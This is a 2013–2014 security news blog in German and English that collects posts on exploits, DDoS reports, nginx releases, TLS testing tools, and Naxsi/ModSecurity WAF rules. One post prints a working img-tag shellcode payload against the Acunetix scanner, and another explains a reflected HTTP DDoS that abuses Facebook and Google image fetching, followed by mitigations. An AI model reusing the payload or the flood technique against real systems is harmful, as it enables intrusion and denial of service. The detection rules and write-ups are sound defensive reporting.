some smart explanations from smart people:




Script fools n00b hackers into hacking themselves

2014.05.02

by The Register:

"Indian Facebook users targeting their mates shoot selves in foot.

noob father

Security experts have warned Facebook users in India not to fall for a new scam which tricks victims into “self cross-site scripting” by promising access to a tool which will let them hack their friends’ accounts.

Symantec security response manager Satnam Narang revealed in a blog entry that a post began circulating last week on Facebook featuring a video with tips on how to hack accounts.

That post apparently linked to a Google Drive document containing code that the scammers claimed will allow users to see their friends’ passwords, if they cut and paste it into their browser window.

He continued:

What really happens when you paste this code into your browser console window is that a series of actions are performed using your Facebook account without your knowledge. Behind the scenes, your account is used to follow lists and users, and give likes to pages in order to inflate the follower and like counts defined by the scammers.

Your account is also used to tag the names of all your friends in the comment section of the original post. This is done to help the scam spread further, playing off the curiosity of your friends, who may visit the post to find out more and hopefully follow the instructions as well.

Pics somewhat related

noobs

gangsta idiots




Nginx überholt Apache bei den Top 1000 Websites

2014.04.29

Nginx hat den Webserver Apache im Ranking der Top 1000 Websites im April 2014 das erste Mal überholt und lag mit 38.2% knapp vor Apache mit 34.2% [1].

Insgesamt hat sich die Verbreitung von Nginx in den letzten 2 Jahren verdoppelt; seit 2010 beträgt der Zuwachs mehr als das 5fache.

Webserver-Ranking 2014
nginx-usage 2014

Webserver-Ranking 2013
nginx-usage 2013

historische Daten, alle Sites
webserver-usage

alle Daten/Grafiken mit freundlicher Genehmigung & (c) Copyright 2013,2014 W3Techs

omg!

Referenzen

  1. Usage of web servers broken down by ranking / w3techs



Nginx 1.6.0 und 1.7.0 veröffentlicht

2014.04.28

Am 24.04. wurde Nginx-1.6.0 stable veröffentlicht; dieser Zweig beinhaltet jetzt die Änderungen des 1.5.x - Branches, u.a (die komplette Liste der neuen Features befindet sich weiter unten) [2,3,4]

  • einige neue SSL-Features
  • SPDY 3.1 - Unterstützung
  • Cache - Revalidierung
  • auth request module

Des weiteren wurde der Mainline 1.5er-Branch in den 1.7er Branch umbenannt, in dem die weitere Entwicklung neuer Module und Features vorangetrieben wird; Ein Blogpost auf nginx.com erläutert die Unterschiede der beiden Branches [1]

nginx-branches

(Bild mit Genehmigung von nginx.com)

Komplette Liste der neuen Features aus dem Changelog [4]

  • Feature: the ngx_http_mp4_module now supports the "end" argument.
  • Feature: byte ranges support in the ngx_http_mp4_module and while saving responses to cache.
  • Feature: the "proxy_protocol" parameters of the "listen" and "real_ip_header" directives, the $proxy_protocol_addr variable.
  • Feature: the $ssl_session_reused variable.
  • Feature: the ngx_http_spdy_module now uses SPDY 3.1 protocol. Thanks to Automattic and MaxCDN for sponsoring this work.
  • Feature: the ngx_http_mp4_module now skips tracks too short for a seek requested.
  • Feature: the "ssl_buffer_size" directive.
  • Feature: the "limit_rate" directive can now be used to rate limit responses sent in SPDY connections.
  • Feature: the "spdy_chunk_size" directive.
  • Feature: the "ssl_session_tickets" directive. Thanks to Dirkjan Bussink.
  • Feature: IPv6 support in resolver.
  • Feature: the "listen" directive supports the "fastopen" parameter. Thanks to Mathew Rodley.
  • Feature: SSL support in the ngx_http_uwsgi_module. Thanks to Roberto De Ioris.
  • Feature: vim syntax highlighting scripts were added to contrib. Thanks to Evan Miller.
  • Feature: the "proxy_cache_revalidate", "fastcgi_cache_revalidate", "scgi_cache_revalidate", and "uwsgi_cache_revalidate" directives.
  • Feature: the "ssl_session_ticket_key" directive. Thanks to Piotr Sikora.
  • Feature: the "fastcgi_buffering" directive.
  • Feature: the "proxy_ssl_protocols" and "proxy_ssl_ciphers" directives. Thanks to Piotr Sikora.
  • Feature: optimization of SSL handshakes when using long certificate chains.
  • Feature: the mail proxy supports SMTP pipelining.
  • Feature: the "disable_symlinks" directive now uses O_PATH on Linux.
  • Feature: now nginx uses EPOLLRDHUP events to detect premature connection close by clients if the "epoll" method is used.
  • Feature: the ngx_http_auth_request_module.
  • Feature: now several "error_log" directives can be used.
  • Feature: the "ssi_last_modified", "sub_filter_last_modified", and "xslt_last_modified" directives. Thanks to Alexey Kolpakov.
  • Feature: the "http_403" parameter of the "proxy_next_upstream", "fastcgi_next_upstream", "scgi_next_upstream", and "uwsgi_next_upstream" directives.
  • Feature: the "allow" and "deny" directives now support unix domain sockets.

Referenzen

  1. NGINX 1.6 and 1.7 released / nginx.com
  2. [nginx-announce] nginx-1.6.0
  3. [nginx-announce] nginx-1.7.0
  4. Changelog 1.6



Using Facebook Notes + Google to DDoS any website / Reflected HTTP-DDOS

2014.04.25

Facebook Notes allows users to include <img> tags. Whenever a <img> tag is used, Facebook crawls the image from the external server and caches it. Facebook will only cache the image once however using random get parameters the cache can be by-passed and the feature can be abused to cause a huge HTTP GET flood.

reflected http ddos - facebook

Google uses its FeedFetcher crawler to cache anything that is put inside =image(“link”) in the spreadsheet. For instance: If we put =image(“http://example.com/image.jpg”) in one of the cells of Google spreadsheet, Google will send the FeedFetcher crawler to grab the image and cache it to display.

However, one can append random request parameter to the filename and tell FeedFetcher to crawl the same file multiple times. Say, for instance a website hosts a 10 mb file.pdf then pasting a list in the spreadsheet will cause Google’s crawler to fetch the same file 1000 times.

reflected http ddos - google

Workarounds

nginx

http {

   map $http_user_agent $limit_bots {
       default '';
       ~*(google|bing|yandex|msnbot|facebookexternalhit) $binary_remote_addr;
   }

   limit_req_zone $limit_bots zone=bots:10m rate=1r/s

  server { 

    location / {
      limit_req zone=bots burst=5 nodelay;
    }

  }   

Apache

# Thors-Hammer-Solution
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^facebookexternalhit.*$ [OR]
RewriteCond %{REQUEST_URI} !/images/stop.jpg
RewriteRule .*.(mpg|png|mp3|gif|GIF|jpg|JPG)$ /images/stop.jpg [R]



Pwn the n00bs - Acunetix 0day

2014.04.24

Link zum Original-Artikel von Danor Cohen - (An7i): Pwn the n00bs - Acunetix 0day

tl;dr:

  1. lege einen versteckten IMG-Tag mit mehr als 256 Zeichen und etwas Shellcode an, a la
    <img src="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB 0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9 JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWL NG6LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQ K15XUXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKP UWNKRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”>
  2. warte auf jemanden, der die präparierte Seite mit dem Acunetix-Scanner heimsucht
  3. ???
  4. PROFIT!

Aus dem Artikel:

"Following all the above, we created a powerful exploit that Newbie hackers will definitely fall for. This exploit will give us the ability to do everything with all that nasty Newbie hackers that scan our sites day and night, killing our traffic, filling all the web site forms with junk and so on… Furthermore it can be used in order to collect smart intelligence about hostile forces who want to attack our web application.

acunetix-0day




The rise of DDoS Botnets by Imperva

2014.04.04

The following charts show the development of botnets and botnet-capabilities in 2013/2014.

Source: The rise of DDoS Botnets by Imperva

ddos-attacks




30 critical Java / Oracle -Cloud - Vulns published by Adam Gowdiak (Naxsi Ruleset-Update)

2014.04.03

Adam Gowdiak published 30+ critical vulns and pocs against oracle's java-cloud and weblogic-server; see SE-2013-01 Press Info (2) @ security-explorations.com

CAUTION: these rules are untested, since we dont run any weblogic-server or oracle-cloud-services and might break stuff. please test carefully before deploying

after short skimming through the exploit-codes i came up with some Naxsi-rules to possibly detect malicious access-attempts (updates have been pushed to doxi-rulesets already;

[+] new sigs:
  42000346 :: app_server.rules     :: Possible Java-Beans-Injection
  42000347 :: web_apps.rules       :: Possible Wordpress-Plugin-Backdoor detected
  42000348 :: app_server.rules     :: Possible Java.Lang - Injection (URL-Args & POST-Body)
  42000349 :: app_server.rules     :: Possible JAR-File Upload
  42000350 :: app_server.rules     :: Possible WAR - File Upload
  42000351 :: app_server.rules     :: Possible JSP - File Upload
  42000352 :: app_server.rules     :: Properties-File Access / Upload
  42000353 :: app_server.rules     :: Content-Type x-java-serialized-object
  42000354 :: app_server.rules     :: WebLogicServer wls_deployment_internal - Access
  42000355 :: app_server.rules     :: WebLogicServer wls_internal - Access



#
# sid: 42000355 | date: 2014-04-03 - 23:00 
#
# http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:wls_internal/" "msg:WebLogicServer wls_internal - Access" "mz:URL" "s:$UWA:8" id:42000355  ;


#
# sid: 42000354 | date: 2014-04-03 - 22:59 
#
# http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:wls_deployment_internal/" "msg:WebLogicServer wls_deployment_internal - Access" "mz:URL" "s:$UWA:8" id:42000354  ;


#
# sid: 42000353 | date: 2014-04-03 - 22:58 
#
# http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:x-java-serialized-object" "msg:Content-Type x-java-serialized-object" "mz:$HEADERS_VAR:Content-Type " "s:$UWA:8" id:42000353  ;


#
# sid: 42000352 | date: 2014-04-03 - 22:54 
#
# http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:.properties" "msg:Properties-File Access / Upload" "mz:URL|FILE_EXT" "s:$UWA:8" id:42000352  ;


#
# sid: 42000351 | date: 2014-04-03 - 22:51 
#
# http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:.jsp" "msg:Possible JSP - File Upload" "mz:FILE_EXT" "s:$UWA:8" id:42000351  ;


#
# sid: 42000350 | date: 2014-04-03 - 22:41 
#
# 
#
MainRule "str:.war" "msg:Possible WAR - File Upload" "mz:FILE_EXT" "s:$UWA:8" id:42000350  ;


#
# sid: 42000349 | date: 2014-04-03 - 22:42 
#
# 
#
MainRule "str:.jar" "msg:Possible JAR-File Upload" "mz:FILE_EXT" "s:$UWA:8" id:42000349  ;


#
# sid: 42000348 | date: 2014-04-03 - 21:57 
#
# phew! http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:java.lang." "msg:Possible Java.Lang - Injection (URL-Args & POST-Body)" "mz:BODY|ARGS" "s:$UWA:8" id:42000348  ;


#
# sid: 42000346 | date: 2014-03-20 - 19:44 
#
# http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html
# ref - sid: 42000286
#
MainRule "str:java.beans.eventhandler" "msg:Possible Java-Beans-Injection" "mz:BODY|ARGS" "s:$UWA:8" id:42000346  ;

References




Cryptolocker … you little shit

2014.04.01

Interessanter Artikel eines Whitehats, der über einen kleinen Hack Zugriff auf die Cryptolocker-Backend-Datenbank erhält; der DB-Zugang ist wohl mittlerweile geschlossen, die über TOR-erreichbare Seite aber weiterhin Online.

cryptolocker

Quelle: Cryptolocker … you little shit.




How a Hacker Intercepted FBI and Secret Service Calls With Google Maps

2014.03.04

from Gawker.com:

"Earlier this week, Bryan Seely, a network engineer and one-time Marine, played me recordings of two phone calls (embedded below.) The calls were placed by unwitting citizens to the FBI office in San Francisco and to the Secret Service in Washington, D.C. Neither the callers nor the FBI or Secret Service personnel who answered the phone realized that Seely was secretly recording them. He used Google Maps to do it."

Read more @ gawker.com




testssl.sh: Testing TLS/SSL encryption

2014.02.28

testssl

testssl.sh is a free Unix command line tool which checks a servers service on any port for the support of TLS/SSL ciphers, protocols as well as some cryptographic flaws.

It is designed to provide clear output for a "is this good or bad" decision.

GOTO: testssl.sh




GitHub RCE by Environment variable injection Bug Bounty writeup by Joernchen

2014.02.27

GitHub blogged a while ago about some internal tool called gerve: https://github.com/blog/530-how-we-made-github-fast

Upon git+sshing to github.com gerve basically looks up your permission on the repo you want to interact with. Then it bounces you further in another forced SSH session to the back end where the repo actually is.

At some point I figured that it is possible to inject some environment variables into gerve/the forked SSH process by setting my username to something like "joerchen\n\nLD_ASSUME_KERNEL=1\n\n".

**Read more




PostgreSQL packages for Debian and Ubuntu updated

2014.02.26

postgresql-logo

Aus dem PostgreSQL - Wiki:

"The PostgreSQL Global Development Group (PGDG) maintains an APT repository of PostgreSQL packages for Debian and Ubuntu located at http://apt.postgresql.org/pub/repos/apt/. We aim at building PostgreSQL server packages as well as extensions and modules packages on several Debian/Ubuntu releases for all PostgreSQL versions supported.

Currently, we support

  • Debian 6.0 (squeeze), 7.0 (wheezy), and unstable (sid) 64/32 bit (amd64/i386)
  • Ubuntu 10.04 (lucid), 12.04 (precise), 13.10 (saucy), 14.04 (trusty) 64/32 bit (amd64/i386)
  • PostgreSQL 8.4, 9.0, 9.1, 9.2, 9.3
  • Server extensions such as Slony-I, various PL languages, and datatypes
  • Applications like pgadmin3, pgbouncer, and pgpool-II

Packages for older PostgreSQL versions and older Debian/Ubuntu distributions will continue to stay in the repository; updates for those will be provided on an ad-hoc basis.

GOTO: wiki.postgresql.org

References :




SSL Labs: Testing for Apple's TLS authentication bug

2014.02.26

apple-ssl-tls-bug

Der SSL Labs Client Test von ssllabs.com wurde erweitert und verfügt jetzt über die Möglichkeit, den Apple SSL/TLS Authentication Bug für Browser und Clients zu überprüfen.

In einem Blogpost erläutert Ivan Ristić weitere Details zum Test.




Schere, Stein, Papier für SecOps

2014.02.24

schere stein papier

courtesy of and copyright by Lenny Zeltser




An In-depth Analysis of Linux/Ebury-Rootkit (ESET-Blog)

2014.02.24

linux backdoored

aus dem Artikel:

ESET has been analyzing and tracking an OpenSSH backdoor and credential stealer named Linux/Ebury. The result of this work on the Linux/Ebury malware family is part of a joint research effort with CERT‑Bund, the Swedish National Infrastructure for Computing, the European Organization for Nuclear Research (CERN) and other organizations forming an international Working Group.

In this blog post, we provide an in-depth analysis of Linux/Ebury. It is a sophisticated backdoor used to steal OpenSSH credentials and maintain access to a compromised server. According to previous reports, this backdoor has been in the wild for at least two years."

zum Artikel: An In-depth Analysis of Linux/Ebury




WAF-Regeln für Tomcat/Apache-Commons File Upload DOS CVE-2014-0050

2014.02.17

Erklärung der Schwachstelle und weitere Workarounds (Apache/Nginx):

Schlaf, Tomcat, Schlaf - Tomcat/Apache Commons FileUpload DoS und Workarounds CVE-2014-0050

Naxsi

#
# sid: 42000342 |  date: 2014-02-16 - 00:54:09 | maker: lazydog
# 
# http://mail-archives.apache.org/mod_mbox/www-announce/201402.mbox/%3C52F373FC.9030907@apache.org%3E
# http://blog.spiderlabs.com/2014/02/cve-2014-0050-exploit-with-boundaries-loops-without-boundaries.html


MainRule "rx:multipart\/form-data;(\s*)boundary=[a-zA-Z0-9_-]{4000}" "msg:DN APP_SERVER Tomcat/Apache-Commons File Upload DOS Attempt" "mz:$HEADERS_VAR:Content-Type" "s:$ATTACK:8" id:42000342 ; 

ModSecurity

SecRule REQUEST_HEADERS:Content-Type "@rx .{4000}"



How I hacked Github again by Egor Homakov

2014.02.08

Eine Geschichte über Liebe, Romantik, und wie Egor Homakov durch Kombinieren von 5 simplen, unkritischen Sicherheitslücken einen schwerwiegenden Exploit zusammenbastelte, durch den er Accounts übernehmen und Zugriff auf private Repositories erhielt.

Github hat die Lücken bestätigt und bereits geschlossen und Egor die bisher höchsten Bounties aus dem neuen Bug-Bounty-Programm vergeben.

Mehr Infos:




Buch: Bulletproof SSL/TLS and PKI von Ivan Ristić in Auszügen und für Vorbestellungen verfügbar

2014.02.05

Das neue Buch von Ivan Ristić, "Bulletproof SSL/TLS and PKI", ist ab sofort in Auszügen und für Vorbestellungen über Feisty Duck verfügbar. [1]

Der größte Teil des Buches, mit knapp 200 Seiten ca 60%, ist bereits fertig und steht als PDF, Epub, Kindle/Mobi und Online-Version bereit zum Lesen sowie Download. Der jetzt veröffentlichte Teil behandelt hauptsächlich den Praxis- und Anwendungsbereich; ein komplettes Inhaltsverzeichnis ist unter [3] zu finden.

Folgende Kapitel sind verfügbar (Zitate aus der Ankündigung [2]) :

  • Chapter 10, OpenSSL Cookbook: describes the most frequently used OpenSSL functionality, largely focusing on installation, configuration, and key and certificate management.
  • Chapter 11, Testing with OpenSSL: continues with OpenSSL and explains how to use its command-line tools to test server configuration. Even though it is often much easier to use an automated tool for testing (e.g., the SSL Labs Server Test), OpenSSL remains the de facto standard for troubleshooting.
  • Chapter 12, Configuring Apache: discusses the SSL configuration of Apache httpd.
  • Chapter 13, Configuring Java and Tomcat: covers the current versions of Java and Tomcat, and gives a glimpse of whats coming in Java 8. (Java 8 coverage will improve soon after Oracle makes the final release candidate available.)
  • Chapter 14, Configuring Microsoft Windows and IIS: discusses the Microsoft Windows platform and the Internet Information Server.
  • Chapter 15, Configuring Nginx: discusses the Nginx web server, covering the features in the stable and development version equally.
  • Appendix, SSL/TLS Deployment Best Practices: serves as a temporary replacement for the yet-to-be-written Chapter 6, Deployment. It covers the same material and gives the same advice, only in fewer words.

Referenzen

  1. Bulletproof SSL/TLS and PKI Preorder @ FeistyDuck
  2. News: Bulletproof SSL/TLS and PKI available for early access and preorder
  3. Bulletproof SSL/TLS and PKI: Early Access TOC and Preface



Cookie Bomb or lets break the Internet.

2014.02.03

Interesting Blogpost by Egor Homakov on how to break global CDNs for Users:

"TL;DR I can craft a page "polluting" CDNs, blogging platforms and other major networks with my cookies. Your browser will keep sending those cookies and servers will reject the requests, because Cookie header will be very long. The entire Internet will look down to you. "

read more @ Cookie Bomb or lets break the Internet




Whoop, there it is! Linux local root exploit for CVE-2014-0038 ( CONFIG_X86_X32=y )

2014.02.03

Nach Bekanntwerden einer kritischen Lücke im Linux-Kernel vor 3 Tagen [1] wurden zugehörige Exploits nun auf Github veröffentlicht [2,7]; die entsprechende reddit-Diskussion findet sich unter [3].

Betroffen von der Lücke sind Kernel > 3.4 mit aktiviertem 32bit - Subsystem; als einzige Mainline-Distro hat Ubuntu dieses Feature aktiviert (13.10 + 12.04 LTS); Updates stehen bereits bereit [4-6].


Referenzen *

  1. Linux 3.4+: arbitrary write with CONFIG_X86_X32 (CVE-2014-0038) @ ossec
  2. saelo / cve-2014-0038
  3. reddit: Linux local root exploit for CVE-2014-0038
  4. 13.10 / USN-2096-1: Linux kernel vulnerability
  5. 12.04 / USN-2094-1: Linux kernel (Raring HWE) vulnerability
  6. 12.04 / USN-2095-1: Linux kernel (Saucy HWE) vulnerability
  7. pastebin / recvmmsg.c



XXE in OpenID: one bug to rule them all, or how I found a Remote Code Execution flaw affecting Facebook's servers

2014.01.23

Ein schwerwiegender Facebook-Bug führte zu Remote-Code-Execution auf Facebook-Servern; das Problem wurde per Hotfix innerhalb von 3 Stunden gelöst und der bisher größte Bug-Bounty vergeben.

Nähere Infos dazu gibt der folgende Blogpost vom Finder der Lücke, Reginaldo Silva: XXE in OpenID: one bug to rule them all, or how I found a Remote Code Execution flaw affecting Facebook's servers

Mehr Infos zu den Facebook-Reaktionen und Anerkennung des Bugs hier: Facebook Bug Bounty zu dem Thema (33.000 $) )




LINKSYS &amp; NETGEAR Backdoor by the Numbers

2014.01.22

From the Blog:

"On January first, Eloi Vanderbeken posted his findings on a backdoor that listens on TCP port 32764. The backdoor appears to affect older versions of Netgear and Linksys routers but some users are also reporting that other brands are also affected by the backdoor. Eloi was also able to write a python script that had the ability to check for the vulnerability among other functions.

...

This is where the real data comes in. My first thought was "Oh man, here comes the part where we get to tell the world 400,000 routers are vulnerable RIGHT NOW!" The results were actually quite surprising. It turns out that only 4,998 routers were exposed and vulnerable."

Similar Result, but different distribution amongst Countries from quarkslab.com: "In the end, we found about 6500 routers running this backdoor.", from "TCP backdoor 32764 or how we could patch the Internet (or part of it ;))"

References




SSL Labs: striktere Anforderungen ab 2014

2014.01.22

SSLLabs und der SSL-Rating-Guide wurden in neuen Versionen veröffentlicht und an die aktuellen Anforderungen angepasst.

Neue Rating-Klassen ( A+ / A- ) erlauben feiner abgestufte Resultate, unsichere Einstellungen (Nutzen von MD5 als Cipher-Suiten, Keylänge < 1024bit) werden mit dem Rating F bestraft; TLS 1.2 ist für das Erlangen eines A - Ratings nun notwendig.

Weitere Infos und eine Liste aller Änderungen finden sich in dem Blogpost von Ivan Ristic

mare ssl

References




I Know You Need New Toner

2014.01.15

Global Map of Public Printers, via Shodan

printers by shodan

References




Exploit-Database bei Github veröffentlicht

2014.01.13

exploit-db

Offensive's Security Exploit Database, Online bisher unter exploit-db.com und als Offline-Version in Kali-Linux verfügbar, ist auf GitHub als Dateiarchiv und csv-Datendump veröffentlich worden;neue Exploits erscheinen zeitgleich mit den Updates auf exploit-db.com

Referenzen




Prolexic Q3 2013 Global DDoS Attack Report

2014.01.12

Source: Prolexic Knowledge Center DDoS Attack Report Q3 2013 Attack-Type Metrics Infographic

Q3 2013 Global DDoS Attack Report - Attack Type Metrics

In Q3 2013, malicious actors shifted to reflection and amplification (DrDoS) attacks to launch more powerful attacks with fewer resources. This graphical analysis of attacks against Prolexic’s global client base showed an increase in reflection attacks and UDP floods and a decline in the use of SYN floods.

The Q3 2013 global DDoS attack trends infographic also shows:

  • Infrastructure layer (Layer 3 and 4) DDoS attacks are more popular than application layer DDoS attacks (Layer 7)
  • CHARGEN-based DDoS attacks are on the rise
  • SYN floods are the more popular DDoS attack type
  • Reflection DDoS attacks increased 69 percent
  • Statistical breakdowns of DDoS attacks by attack vector, including SSL, HTTP, POST, GET, ACK, CHARGEN, UDP, SYN and ICMP

Reference:




Dual_Ec_Drbg backdoor: a proof of concept

2014.01.12

"Dual_EC_DRBG is an pseudo-random number generator promoted by NIST in NIST SP 800-90A and created by NSA. This algorithm is problematic because it has been made mandatory by the FIPS norm (and should be implemented in every FIPS approved software) and some vendors even promoted this algorithm as first source of randomness in their applications. edit: I’ve been told it’s not the case anymore in FIPS-140-2 but the cat is already out of the bag

If you still believe Dual_EC_DRBG was not backdoored on purpose, please keep reading. In 2007 already, Dan Shumow and Niels Ferguson from Microsoft showed that Dual_EC_DRBG algorithm could be backdoored. Twitter also uncovered recently that this algorithm was even patented in 2004 by Dan Brown (Not the Da Vinci guy, the Certicom one) as a “key escrow mechanism” (government jargon/lingo for trapdoor/backdoor). I will go a little bit further in explaining how it works and give a proof-of-concept code, based on OpenSSL FIPS. This is in the best of my knowledge the only public proof of concept published today. "

References




How's My SSL? SSL-Browser-Test

2014.01.09

How's My SSL? is a cute little website that tells you how secure your TLS client is. TLS clients just like the browser you're reading this with.

Links




A Forensic Overview of a Linux perlbot

2014.01.08

"It's fairly old news that exploit attempts against PHP, ColdFusion, and Content Management Systems are quite common these days. Most of these attempts target old vulnerabilities, hoping to hit enough neglected servers to make it worthwhile. In some cases, a particular exploit may succeed against a high value server, leading to some pretty significant data leakage. In others, the attacker is going for volume, where they can make use of a large number of compromised hosts.

I recently noticed a PHP exploit attempt coming from several HK and CN IP addresses, so I allowed the exploit on my honeypot and documented the results. The resulting activity was very reminiscent of the the early botnet days, with IRC Command and Control, as well as the use of the compromised host as a scanning tool."

Read more @ Andre M. DiMinos Blog: A Forensic Overview of a Linux perlbot




Scanning the Internet: Nmap's Favicon Map

2014.01.08

"The Nmap Project is pleased to release our new and improved Icons of the Web project! Since our free and open source Nmap Security Scanner software is all about exploring networks at massive scale, we started by scanning the top million web sites for 2013 (as ranked by the analytics company Alexa). We then downloaded each site's favicon—the small icon displayed next to a site title in browser bookmarks and tabs.

We scaled the icons in proportion to each site's monthly reach (popularity) and placed them in a giant collage. The smallest icons—for sites visited by only 0.00004% of the Internet population each month—are 256 pixels square (16x16). The largest icon (Google) is 394 million pixels. The whole collage is 5 gigapixels."

Src: nmap.org/favicon/


nmap-iconmap




Domain typo finder

2014.01.08

Typofinder for domain typo discovery

Released as open source by NCC Group Plc - http://www.nccgroup.com/

A sample deployment can be found here:

http://www.zemes.com:8002/

Features

  • Domain to IP
  • MX records
  • A and AAAA
  • www address records
  • webmail address records
  • m address records
  • A keyboard map template system (currently UK supplied)
  • Geographic IP to flag
  • Google safe browsing integration
  • Bit flipping / squatting - http://dinaburg.org/bitsquatting.html
  • Whois



Internet-Wide Scan Data Repository

2014.01.08

The Internet-Wide Scan Data Repository is a public archive of research data collected through active scans of the public Internet. The repository is hosted by the ZMap Team at the University of Michigan and was founded in collaboration with Rapid7. We are happy to host scan data responsibly collected by all researchers. A JSON interface to the repository is available at https://scans.io/json.

... more ...




(IN)SECURE Magazine Issue 40: Exposing Malware

2013.12.03

TOC

  • How malware became the cyber threat it is today
  • Testing anti-malware products
  • Shoulder surfing via audio frequencies for XBox Live passwords
  • How to write Yara rules to detect malware
  • Report: HITBSecConf2013 Malaysia
  • Using Tshark for malware detection
  • 5 questions for the head of a malware research team
  • Beyond apps, beyond Android: 2013 mobile threat trends
  • Malware analysis on a shoestring budget
  • Report: Virus Bulletin 2013
  • Digital ship pirates: Researchers crack vessel tracking system
  • Exploring the challenges of malware analysis
  • Evading file-based sandboxes
  • Report: RSA Conference Europe 2013
  • Data security to protect PCI data flow

(IN)SECURE-Magazine Website

download ISSUE 40




Security Headers on the Top 1,000,000 Websites: November 2013 Report

2013.12.02

"It has been almost exactly a year since we conducted the first top 1 million security headers report so it is a great time to re-run the analysis and see how well security header adoption is growing. As before, the latest Chrome and Firefox User-Agent strings were used to make requests to the top 1 million sites over both HTTP and HTTPS. Out of the 2,589,918 responses we had over 100,000 distinct security headers and values to analyze."

Read more @ Veracode - Blog




Large-scale net traffic misdirections and MitM attacks detected

2013.11.28

By Renesys

Traffic interception has certainly been a hot topic in 2013. The world has been focused on interception carried out the old fashioned way, by getting into the right buildings and listening to the right cables. But there’s actually been a significant uptick this year in a completely different kind of attack, one that can be carried out by anybody, at a distance, using Internet route hijacking.

more: The New Threat: Targeted Internet Traffic Misdirection by Renesys

traffic redirection




THOUSANDS of Ruby on Rails sites leave logins lying around

2013.11.28

By The Register

A security researcher has warned that a Ruby on Rails vulnerability first outlined in September is continuing to linger on the Web, courtesy of admins that don't realise a vulnerability exists in its default CookieStore session storage mechanism.

The weakness affects some big names, with the research turning up names like Warner Bros, Kickstarter, and the popular Tweet-aggregator tool Paper.li.

read more @ The Register

Mehr Infos zur Lücke gibt das Security Bulletin 13.17 :: Lebenslänglich: Rails speichert SessionCookies ohne Verfallsdatum




Splinter RAT - Sourcecode für Botnet veröffentlicht

2013.11.28

reddit - Diskussion über den Sourecode des Java-basierten Splinter-Botnetzes


Link: Splinter - The RAT | reddit




Reddit-AMA by Bruce Schneier

2013.11.28

My short bio: Bruce Schneier is an internationally renowned security technologist, called a "security guru" by The Economist. He is the author of 12 books -- including Liars and Outliers: Enabling the Trust Society Needs to Survive -- as well as hundreds of articles, essays, and academic papers. His influential newsletter "Crypto-Gram" and his blog "Schneier on Security" are read by over 250,000 people. He has testified before Congress, is a frequent guest on television and radio, has served on several government committees, and is regularly quoted in the press. Schneier is a fellow at the Berkman Center for Internet and Society at Harvard Law School, a program fellow at the New America Foundation's Open Technology Institute, a board member of the Electronic Frontier Foundation, an Advisory Board Member of the Electronic Privacy Information Center, and the Security Futurologist for BT -- formerly British Telecom.

Proof: https://www.schneier.com/blog/archives/2013/11/reddit_ask_me_a.html

Thank you all for your time and for coming by to ask me questions. Please visit my blog for more information and opinions.


Link: AMA by Bruce Schneier @ reddit

Disclaimer: AMA means: ask me anything




Twitter finally accepts industry best practices by closing known security holes

2013.11.28

"As part of our continuing effort to keep our users’ information as secure as possible, we’re happy to announce that we recently enabled forward secrecy for traffic on twitter.com, api.twitter.com, and mobile.twitter.com." twitter.com / Forward Secrecy at Twitter


Credits for title: jjhare @ reddit




How Antisec Died

2013.11.27

Interessanter Artikel von Quinn Norton über Anonymous, Antisec, Jeremy Hammond, Sabu, und den Geheimdienst-Industriellen Komplex

Link: Artikel: How Antisec Died - Notes from a strange World




Digital Attack Map: DDoS-Angriffe in Echtzeit beobachten

2013.10.21

Digital Attack Map ist eine Echtzeit-Darstellung von DDoS-Angriffen weltweit. Zusätzlich werden historische Daten zur Verfügung gestellt, anhand derer man einzelne Ereignisse, DDoS-Quellen und Ziele sowie dazugehörende News untersuchen kann.

Realisiert wurde die Karte durch die Zusammenarbeit von Arbor Networks und Google Ideas, ein FAQ erklärt die Hintergründe, Datenquellen und -umfang.


Referenzen:


Screenshots

digital attack map

digital attack map - detail

digital attack map - by source and dest




You code … we platform.